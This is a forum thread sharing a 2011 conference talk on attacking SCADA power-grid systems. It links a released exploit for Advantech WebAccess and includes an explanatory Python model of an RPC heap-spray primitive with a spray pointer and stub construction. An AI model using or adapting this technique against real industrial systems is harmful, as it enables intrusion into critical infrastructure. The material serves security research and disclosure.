Teddy Rogers
Posted March 28, 2011

You can download the slides of the research I was presenting at RootedCon'11 in Madrid, "SCADA Trojans: Attacking the grid". A journey into attacking the power grid. I presented:

- 0days in the Advantech/BroadWin WebAccess SCADA product
- Weak design/vulnerabilities in CSE-Semaphore TBOX RTUs
- A general attack against EMS software via state estimators

I contacted ICS-CERT to coordinate with Advantech but the vendor denied having a security flaw. So guys, the exploit I'm releasing does not exist. All is a product of your mind. Well, indeed WebAccess is full of bugs. It is an RPC exploit against WebAccess Network Service, port 4592. It leaks the security code that protects the SCADA node in addition to demonstrating RCE on XP. Slight modifications can be done to support other systems. I use "RPC heap spray", I mean any opcode with the following params "[in] long arg_x, [in][ref][size_is(arg_x)] char * arg_x" can be used to create a fake object to control the execution. It could be done in other ways, but this one is funny. Check the slides, there is more info about the vulns there.

http://www.reversemode.com/downloads/exploit_advantech.zip
http://www.reversemode.com/downloads/Scada_Trojans_Ruben_Rootedcon.pdf

Ted.
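The "RPC heap spray" idea above rests on how MIDL marshals a `[in] long n, [in][ref][size_is(n)] char *buf` pair: the client supplies both the count and the bytes, and the server stub allocates `n` bytes on the process heap and copies the client data in, so repeating any such call fills the heap with attacker-chosen content. The block below is an added illustration, not code from the post, the slides or the released exploit. It models the NDR encoding of that parameter pair and the server-side allocate-and-copy in Python; it does not speak to WebAccess or to any real interface, and the opcode, interface UUID and spray address are deliberately left as assumptions (the `0x0C0C0C0C` value is the usual 32-bit choice, picked here only because every byte is identical, so a read at any offset into the spray returns the same pointer).

```python
import struct

# Constructed spray value, an assumption for illustration only: on a 32-bit
# target the sprayed region is meant to cover this address, so a fake object
# whose every slot holds it chains obj->vtable->slot back into the spray.
SPRAY_PTR = 0x0C0C0C0C


def ndr_conformant_char_array(data: bytes) -> bytes:
    """NDR wire form of `[in][ref][size_is(n)] char *buf` as a top-level
    parameter: 4-byte conformance count, then the raw bytes. A top-level
    ref pointer carries no referent id. Trailing pad keeps the next
    parameter 4-byte aligned (assumed layout for the example)."""
    count = len(data)
    return struct.pack("<I", count) + data + b"\x00" * ((-count) % 4)


def build_stub(data: bytes) -> bytes:
    """Stub data for the pair `[in] long arg_x, [in][ref][size_is(arg_x)]
    char *arg_x`: the length argument, then the conformant array whose
    count the server will check against it."""
    return struct.pack("<i", len(data)) + ndr_conformant_char_array(data)


def server_unmarshal(stub: bytes) -> bytes:
    """Model of the MIDL-generated server stub: read arg_x, read the
    conformance count, require them to agree, then midl_user_allocate(count)
    on the process heap and copy count bytes in. The returned bytes stand
    for that heap block; its size and content are entirely client-chosen,
    which is what makes any such opcode usable as a spray primitive."""
    (arg_x,) = struct.unpack_from("<i", stub, 0)
    (count,) = struct.unpack_from("<I", stub, 4)
    if arg_x < 0 or count != arg_x:
        raise ValueError("conformance count does not match size_is argument")
    if len(stub) < 8 + count:
        raise ValueError("stub shorter than the declared array")
    return bytes(stub[8:8 + count])


def make_spray_chunk(size: int, ptr: int = SPRAY_PTR) -> bytes:
    """A chunk in which every 4-byte slot holds `ptr`, so whichever offset
    a vulnerable code path dereferences inside the spray yields `ptr`."""
    if size % 4:
        raise ValueError("size must be a multiple of 4")
    return struct.pack("<I", ptr) * (size // 4)


def spray(n_requests: int, chunk: bytes) -> list:
    """Issue the same request n times; each call leaves one copy of `chunk`
    on the server heap. Returns the modelled heap blocks."""
    stub = build_stub(chunk)
    return [server_unmarshal(stub) for _ in range(n_requests)]


def read_ptr(block: bytes, offset: int) -> int:
    """Read a 4-byte little-endian pointer at any offset, aligned or not."""
    return struct.unpack_from("<I", block, offset)[0]


if __name__ == "__main__":
    blocks = spray(256, make_spray_chunk(0x10000))
    print("sprayed %d blocks of %d bytes" % (len(blocks), len(blocks[0])))
    print("pointer read at odd offset: 0x%08x" % read_ptr(blocks[7], 0x123))
```

In a real client the stub bytes would be carried in a DCE/RPC request PDU addressed to the target interface and opcode; the model stops at the stub because that is where the size_is pair gives the client control over the allocation. The mismatch check in `server_unmarshal` is the one the generated stub performs, so a spray has to keep `arg_x` and the conformance count equal; nothing else about the data is validated.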
ghandi
Posted May 23, 2011

We're closer than ever before, but we're still light years away from hacking the gas mains so they will explode and provide cover for an operation we're conducting... (Seen Swordfish anybody? Them d00dz has got skillz0rs.)

On a serious note, thanks for the share Teddy, interesting as always.

HR, Ghandi
Teddy Rogers (author)
Posted May 24, 2011

Actually I'm a bit more into PLCs and industrial technology; I've got quite a few PLCs at home I work with. It's quite surprising how some (very large) companies are open to exploits and security-related issues, so we can expect more to happen in this area...

Ted.